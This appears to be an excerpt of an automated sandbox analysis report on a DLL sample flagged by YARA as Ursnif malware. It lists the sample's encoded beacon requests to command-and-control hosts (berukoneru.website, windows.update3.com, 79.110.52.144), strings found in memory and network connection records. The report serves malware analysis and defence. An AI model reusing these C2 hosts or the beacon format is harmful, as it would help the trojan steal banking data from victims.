            Source: global trafficHTTP traffic detected: GET /tire/SxP522LQqV7N0J/d6o3ODGgGiBAGfgE9kDAi/iJ3hZ0ExIl8p4ocR/5jXJfG8mFLCjP71/7NSaKdzhGeEI1UdiPa/8FnVHvkbS/kpLNStxRjAnliuJ5EZNG/gq3G4NvVU_2BCUhovI0/u7jwUo5n_2BL68IOoZxv34/oRctSCfqONUBa/hRxyIlRY/aB2W4yGH6sVrPB1xJM1YXlq/jJC_2B1iv6kvD5/bMsiwtIS.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
            Source: global trafficHTTP traffic detected: GET /tire/xfoS5YiSnq/LOnpfmnBMaAwxRNJT/gKlVrjFyFJq8/T2InmpA9wuO/M0panYR_2BpfjL/QVPhPbWeSwRVFSzMJ6Vcg/Y9VyT4fbhoZ82vwq/2GIivBsbax9rQUh/n7Uc5KQo0J8ysVLUlr/XSTAmgKJY/zcSJprSz5_2F2B_2Bsbt/2juDsOXqzjP5XLZ_2FP/WpBTOnAHWcoi3w7ov9P0p8/2Wzq8vdJF/5Vrog3ES/Q.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
            Source: global trafficHTTP traffic detected: GET /tire/4rLoqSurzyu0/faIn56YEFho/0rtfGJwOQq2F5c/BJoAXiIiU_2F9ZRU2hBse/gAViRvyFsSwGVefa/kRvG3X29VJojGH9/HHkJOTdVe7Nqn26zmq/y4GSGdPZu/kOhHaVJwE10tGTyVEPor/Cm7rt8Rg13eBm6Sc7Sm/5BVZ_2BPytM06u32e6Y8Q1/6dRgyXIz2yrBpW/dgW2i.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
            Source: global trafficHTTP traffic detected: GET /tire/o4Wh2yGKlAclIXiSKni/E2GRbJwAfyjZDLvIiDUTZP/MYjyQpBnAiuxp/RCS8IZuc/T6rd9RjJyTuIO59AdkBUbyh/AeLhgjzVcK/R628sGYn00PGPEGL1/qe_2FhyY_2B4/KAdwjy0pLGn/wY1nXPl9lZfHBx/mKriUsf47w97_2F05n24c/_2B3uV0T1ULXF_2F/rws1Po8g_2B5W/rqgHz.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
            Source: global trafficHTTP traffic detected: GET /tire/gAFUHu83b7fr5ftbr5O9tX/NNJYheBEZ_2Bt/wXhf6hyZ/iBEWHVb19RFKuDukD6ImzPG/nqeMvnB_2B/0lgxK72Q_2BWOlTx_/2BHVUq8DywzL/dSOEptmJdkD/639IuGSCq9GXlR/PUHxRfZnx0Of7xPsoVOC_/2FTMAnj0YKLpX9By/omZGYbxoocAN6vP/PuGPVsc2wwxbBsmHOU/YqsK1vpPn/dCIkRouQqQLmE/5L.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
            Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
            Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
            Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
            Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
            Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
            Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
            Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
            Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
            Source: 6.dllString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
            Source: 6.dllString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
            Source: loaddll32.exe, 00000000.00000003.434428828.0000000004A88000.00000004.00000040.sdmp, regsvr32.exe, 00000002.00000003.418338276.0000000006518000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.418329153.0000000005C78000.00000004.00000040.sdmp, rundll32.exe, 00000004.00000003.418350281.0000000006148000.00000004.00000040.sdmpString found in binary or memory: http://constitution.org/usdeclar.txt
            Source: loaddll32.exe, 00000000.00000003.434428828.0000000004A88000.00000004.00000040.sdmp, regsvr32.exe, 00000002.00000003.418338276.0000000006518000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.418329153.0000000005C78000.00000004.00000040.sdmp, rundll32.exe, 00000004.00000003.418350281.0000000006148000.00000004.00000040.sdmpString found in binary or memory: http://constitution.org/usdeclar.txtC:
            Source: 6.dllString found in binary or memory: http://crl.globalsign.com/gs/gstimestampingg2.crl0T
            Source: loaddll32.exe, 00000000.00000003.522936760.0000000001341000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.317739016.0000000001341000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.686994186.0000000001344000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.372896811.0000000001341000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.522837252.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.363867556.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.337960981.0000000003382000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.372687409.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.419406202.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.362364384.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.316290862.0000000003383000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.361019833.0000000003383000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.361512151.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.362934990.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.362827191.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.522837424.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.364485968.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.338394833.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.372692121.0000000000F9E000.00000004.00000001.sdmp, powershell.exe, 00000018.00000003.397630801.000001497A51A000.00000004.00000001.sdmp, powershell.exe, 00000018.00000003.400300965.000001497A51A000.00000004.00000001.sdmp, powershell.exe, 00000018.00000003.400801988.000001497A51A000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: 6.dllString found in binary or memory: http://crl.globalsign.net/root.crl0
            Source: 6.dllString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
            Source: 6.dllString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
            Source: 6.dllString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
            Source: 6.dllString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
            Source: loaddll32.exe, 00000000.00000003.434428828.0000000004A88000.00000004.00000040.sdmp, regsvr32.exe, 00000002.00000003.418338276.0000000006518000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.418329153.0000000005C78000.00000004.00000040.sdmp, rundll32.exe, 00000004.00000003.418350281.0000000006148000.00000004.00000040.sdmpString found in binary or memory: http://https://file://USER.ID%lu.exe/upd
            Source: 6.dllString found in binary or memory: http://ocsp.digicert.com0C
            Source: 6.dllString found in binary or memory: http://ocsp.digicert.com0N
            Source: powershell.exe, 00000018.00000003.396802391.000001497A5C1000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: 6.dllString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingg2.crt0
            Source: powershell.exe, 00000018.00000003.396802391.000001497A5C1000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: loaddll32.exe, 00000000.00000003.317582164.000000000139F000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.317644552.00000000013B1000.00000004.00000001.sdmpString found in binary or memory: https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js
            Source: loaddll32.exe, 00000000.00000003.317624845.0000000001398000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.316267329.00000000033D1000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.316701420.00000000008F1000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.316654509.0000000000FFE000.00000004.00000001.sdmpString found in binary or memory: https://aka.ms/MicrosoftEdgeDownload&quot;
            Source: rundll32.exe, 00000004.00000003.338607112.0000000000FF3000.00000004.00000001.sdmpString found in binary or memory: https://assets.onestore.ms/cdnfiles/onestorerolling-1605-16000/shell/common/respond-proxy.html
            Source: rundll32.exe, 00000003.00000003.364039010.00000000008D7000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.372813489.00000000008D7000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.523369955.00000000008D7000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000002.914075643.0000000000F3A000.00000004.00000020.sdmp, rundll32.exe, 00000004.00000003.364485968.0000000000F9E000.00000004.00000001.sdmpString found in binary or memory: https://berukoneru.website/
            Source: regsvr32.exe, 00000002.00000003.372687409.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.372837778.00000000033C0000.00000004.00000001.sdmpString found in binary or memory: https://berukoneru.website/BS
            Source: rundll32.exe, 00000004.00000002.914075643.0000000000F3A000.00000004.00000020.sdmpString found in binary or memory: https://berukoneru.website/LAp
            Source: rundll32.exe, 00000004.00000003.362934990.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.362827191.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.522837424.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.372692121.0000000000F9E000.00000004.00000001.sdmpString found in binary or memory: https://berukoneru.website/O
            Source: regsvr32.exe, 00000002.00000003.362364384.000000000336B000.00000004.00000001.sdmpString found in binary or memory: https://berukoneru.website/j
            Source: regsvr32.exe, 00000002.00000003.522837252.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.363514151.00000000033C1000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.372687409.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.372837778.00000000033C0000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.419406202.000000000336B000.00000004.00000001.sdmpString found in binary or memory: https://berukoneru.website/jP
            Source: regsvr32.exe, 00000002.00000003.362160768.00000000033C0000.00000004.00000001.sdmpString found in binary or memory: https://berukoneru.website/tire/5Dw6h1nh0yZR8l/CEdpvqzTXmbvA8zN38_2F/HfVXZtPlGclvWlY_/2F2pmmVAx7s9on
            Source: rundll32.exe, 00000004.00000003.365155224.0000000000FF2000.00000004.00000001.sdmpString found in binary or memory: https://berukoneru.website/tire/BkVC2TYPKwX7I/d18vbD7j/LfTctW1YFOCxVg72R7OOyCe/FNM87YiO3R/kqhypryuHY
            Source: rundll32.exe, 00000004.00000003.365155224.0000000000FF2000.00000004.00000001.sdmpString found in binary or memory: https://berukoneru.website/tire/SxP522LQqV7N0J/d6o3ODGgGiBAGfgE9kDAi/iJ3hZ0ExIl8p4ocR/5jXJfG8mFLCjP7
            Source: loaddll32.exe, 00000000.00000003.372896811.0000000001341000.00000004.00000001.sdmpString found in binary or memory: https://berukoneru.website/tire/iH0556GjtiGQk4lyd6/e4eJ66Hyx/L2n2id7yGxzkaZSAZenq/25xy0D1xFkintWrbCA
            Source: regsvr32.exe, 00000002.00000003.362615512.00000000033C1000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.372837778.00000000033C0000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.419406202.000000000336B000.00000004.00000001.sdmpString found in binary or memory: https://berukoneru.website/tire/iL5Q0EgKDzXlIJvSVY9Fa72/roFEnyYEEO/BTl6hhjqhLPztNm87/ClBTSTJ24YQi/65
            Source: regsvr32.exe, 00000002.00000003.372829342.000000000335B000.00000004.00000001.sdmpString found in binary or memory: https://berukoneru.website/tire/xfoS5YiSnq/LOnpfmnBMaAwxRNJT/gKlVrjFyFJq8/T2InmpA9wuO/M0panYR_2BpfjL
            Source: rundll32.exe, 00000003.00000003.362882057.00000000008D7000.00000004.00000001.sdmpString found in binary or memory: https://berukoneru.website/tyi
            Source: rundll32.exe, 00000004.00000003.372839349.0000000000FF2000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.372692121.0000000000F9E000.00000004.00000001.sdmpString found in binary or memory: https://berukoneru.website:443/tire/gAFUHu83b7fr5ftbr5O9tX/NNJYheBEZ_2Bt/wXhf6hyZ/iBEWHVb19RFKuDukD6
            Source: regsvr32.exe, 00000002.00000003.522837252.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.363867556.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.372687409.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.419406202.000000000336B000.00000004.00000001.sdmpString found in binary or memory: https://berukoneru.website:443/tire/iL5Q0EgKDzXlIJvSVY9Fa72/roFEnyYEEO/BTl6hhjqhLPztNm87/ClBTSTJ24YQ
            Source: powershell.exe, 00000018.00000003.396802391.000001497A5C1000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: rundll32.exe, 00000004.00000003.316654509.0000000000FFE000.00000004.00000001.sdmpString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4xdax&quot;
            Source: 6.dllString found in binary or memory: https://nodejs.org0
            Source: loaddll32.exe, 00000000.00000003.317582164.000000000139F000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.317644552.00000000013B1000.00000004.00000001.sdmpString found in binary or memory: https://statics-marketingsites-eus-ms-com.akamaized.net/statics/override.css
            Source: regsvr32.exe, 00000002.00000003.363867556.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.372687409.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.362364384.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.361019833.0000000003383000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.361512151.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.362934990.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.362827191.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.364485968.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.372692121.0000000000F9E000.00000004.00000001.sdmpString found in binary or memory: https://windows.update3.com/
            Source: regsvr32.exe, 00000002.00000003.361178760.000000000335B000.00000004.00000001.sdmpString found in binary or memory: https://windows.update3.com/tire/clW2f_2FhATNrnqvBey5XJ/HMTv6hdufnhb6/_2BVSemT/sKeyn9puL2fpAeyTFFwZv
            Source: rundll32.exe, 00000004.00000003.361512151.0000000000F9E000.00000004.00000001.sdmpString found in binary or memory: https://windows.update3.com/tire/h5hri2qU3j_2/FtKGoeU1cGb/_2B9_2FVlXXJXe/pIon3PPVjwV3l856n6O1d/JfgtT
            Source: 6.dllString found in binary or memory: https://www.digicert.com/CPS0
            Source: 6.dllString found in binary or memory: https://www.globalsign.com/repository/0
            Source: 6.dllString found in binary or memory: https://www.globalsign.com/repository/03
            Source: unknownDNS traffic detected: queries for: windows.update3.com
            Source: global trafficHTTP traffic detected: GET /tire/5Dw6h1nh0yZR8l/CEdpvqzTXmbvA8zN38_2F/HfVXZtPlGclvWlY_/2F2pmmVAx7s9onw/Df8mv9bGmzrCq_2BDh/Avhzr_2BW/zhUOFRSj_2Brp9dFi25e/XIimtsTVgbS8Ddk4Jlg/q7ifDAWTLXmxh8fPSAYnUc/3K8xDlQvgKVYD/9E1TEXJC/aPKjFJSRgVkfUwKBYWKDgLh/VONwiC9wK5/3CPG7RAhZST/_2FDfWf.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
            Source: global trafficHTTP traffic detected: GET /tire/BkVC2TYPKwX7I/d18vbD7j/LfTctW1YFOCxVg72R7OOyCe/FNM87YiO3R/kqhypryuHYA4xvaox/Zos6wfhvU6Vx/dZ_2FhTkVUm/dQ1eWiBdVQx_2F/3MQ4AfN6CRhAz7ojdkAuB/vyHN6D_2BnDaccRD/rxLm6HRGflkJaqH/HtsgyaJ8NMuefJHJTr/vf407nMOm/3YNEpWUoxMPlA61ciEA5/ZB4w8oLbC0y/cC.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
            Source: global trafficHTTP traffic detected: GET /tire/fGFKjH5BjbdZz4tmUO5m/ZAUfPXxElw8Dkm9Cfh9/xqmrK6ieQrOr54I1y1Md2B/CJZjvCZRXK_2B/c6YLK40A/ibGCXB5z8qRJaf9iUFEBazW/9sEXIVndb3/DsRsV2z8TCrjx7mBI/rTZxp021lQBU/ESMggS1gJ_2/Bi3Bcj9_2B8Xf4/Xr9j2PgVhY9_2FzIeDatB/WE3DM_2B4ZBLmr9g/bExshi993/JbJC0wJJ/U.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
            Source: global trafficHTTP traffic detected: GET /tire/cFJsSWAGWE/z2qui_2Bz1BNPPVC8/40cjfJwuY_2F/qeMRrcIZBVG/Ne0YpnkwEJfIh3/f5okxbrq_2FXxzqJmpSlY/lBFuBWEAi70a61Vy/5QzGUBrPY97n5jQ/Uty84umyFnIA829ewc/61TtijfTY/zF0ZOoxI3N5pWHzggULR/QMXY_2F7FMDggc4thO7/G_2BQV4WNp08p5XmI0/TT.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
            Source: global trafficHTTP traffic detected: GET /tire/iL5Q0EgKDzXlIJvSVY9Fa72/roFEnyYEEO/BTl6hhjqhLPztNm87/ClBTSTJ24YQi/659nN8frXqL/KI_2BmGQcF3l8a/UPJEdWRElF2Ck7h3GrI7f/Jn4UaIHKOCKly3pR/5WtUgfhtCob3WA8/8RFl0SkPd8NK0tapfV/Bv03ARxcw/T6wxTs3S_2BFMRgrZw2Q/_2BV_2F7vXjmj/i.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
            Source: global trafficHTTP traffic detected: GET /tire/9IgUYNG9/P9N8jGg62VAhbwmUeolHFCg/K1HN9iUPdi/an2HdiNP_2FRIROSF/l9uR7XFSquKc/cTL90RaThvy/4LigE_2BC67Pa2/OL_2Fq6LzSFfAjBrcF1my/5AUpi_2BYfx15AAS/Ho8688ZDo7zPK6r/e_2F4ZPz87sJSle6kT/I1gJ4hikp/cCibgdVeBM9n2ccXEO18/D4MJBqmD.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
            Source: global trafficHTTP traffic detected: GET /tire/iH0556GjtiGQk4lyd6/e4eJ66Hyx/L2n2id7yGxzkaZSAZenq/25xy0D1xFkintWrbCAo/f_2Bdm0MJPWq7ugWEYUqSU/PtgL_2FeeZv0h/UCRQYI_2/FefNYP32vk23pbK3jV8vqXP/0Ovr3EWUID/eiKH_2Fkr5cf0tXqX/_2BscW0pxtbY/lmzrmCcsUPq/Hp_2BA_2BliXkb/fgGnQnQH8/_2B.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
            Source: global trafficHTTP traffic detected: GET /tire/SxP522LQqV7N0J/d6o3ODGgGiBAGfgE9kDAi/iJ3hZ0ExIl8p4ocR/5jXJfG8mFLCjP71/7NSaKdzhGeEI1UdiPa/8FnVHvkbS/kpLNStxRjAnliuJ5EZNG/gq3G4NvVU_2BCUhovI0/u7jwUo5n_2BL68IOoZxv34/oRctSCfqONUBa/hRxyIlRY/aB2W4yGH6sVrPB1xJM1YXlq/jJC_2B1iv6kvD5/bMsiwtIS.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
            Source: global trafficHTTP traffic detected: GET /tire/xfoS5YiSnq/LOnpfmnBMaAwxRNJT/gKlVrjFyFJq8/T2InmpA9wuO/M0panYR_2BpfjL/QVPhPbWeSwRVFSzMJ6Vcg/Y9VyT4fbhoZ82vwq/2GIivBsbax9rQUh/n7Uc5KQo0J8ysVLUlr/XSTAmgKJY/zcSJprSz5_2F2B_2Bsbt/2juDsOXqzjP5XLZ_2FP/WpBTOnAHWcoi3w7ov9P0p8/2Wzq8vdJF/5Vrog3ES/Q.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
            Source: global trafficHTTP traffic detected: GET /tire/4rLoqSurzyu0/faIn56YEFho/0rtfGJwOQq2F5c/BJoAXiIiU_2F9ZRU2hBse/gAViRvyFsSwGVefa/kRvG3X29VJojGH9/HHkJOTdVe7Nqn26zmq/y4GSGdPZu/kOhHaVJwE10tGTyVEPor/Cm7rt8Rg13eBm6Sc7Sm/5BVZ_2BPytM06u32e6Y8Q1/6dRgyXIz2yrBpW/dgW2i.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
            Source: global trafficHTTP traffic detected: GET /tire/o4Wh2yGKlAclIXiSKni/E2GRbJwAfyjZDLvIiDUTZP/MYjyQpBnAiuxp/RCS8IZuc/T6rd9RjJyTuIO59AdkBUbyh/AeLhgjzVcK/R628sGYn00PGPEGL1/qe_2FhyY_2B4/KAdwjy0pLGn/wY1nXPl9lZfHBx/mKriUsf47w97_2F05n24c/_2B3uV0T1ULXF_2F/rws1Po8g_2B5W/rqgHz.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
            Source: global trafficHTTP traffic detected: GET /tire/gAFUHu83b7fr5ftbr5O9tX/NNJYheBEZ_2Bt/wXhf6hyZ/iBEWHVb19RFKuDukD6ImzPG/nqeMvnB_2B/0lgxK72Q_2BWOlTx_/2BHVUq8DywzL/dSOEptmJdkD/639IuGSCq9GXlR/PUHxRfZnx0Of7xPsoVOC_/2FTMAnj0YKLpX9By/omZGYbxoocAN6vP/PuGPVsc2wwxbBsmHOU/YqsK1vpPn/dCIkRouQqQLmE/5L.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
            Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49795 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49796 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49797 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49798 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49799 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49801 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49802 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49803 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49805 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49806 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49807 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49808 version: TLS 1.2

            Key, Mouse, Clipboard, Microphone and Screen Capturing:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000004.00000003.364280068.000000000557D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.316367709.00000000059A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.482173365.000000000557D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.364396735.000000000507D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.317676885.00000000039A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.363061307.000000000372D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.482158894.000000000572D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.418329153.0000000005C78000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.363790330.000000000572D000.00000004.00000040.sdmp, type: MEMORY
